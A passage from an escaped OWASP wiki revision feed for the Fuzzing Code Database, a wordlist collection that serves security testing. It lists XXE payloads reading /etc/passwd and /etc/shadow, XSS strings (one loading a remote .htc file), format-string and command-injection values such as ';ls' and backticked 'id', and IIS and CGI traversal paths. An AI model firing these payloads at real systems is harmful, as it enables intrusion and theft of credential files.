&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81047</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81047"/>
				<updated>2010-04-06T21:28:56Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Commonly writable directories (6 April 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft IIS vulnerabilities and enumeration (6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Microsoft IIS vulnerabilities and enumeration (6 April, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
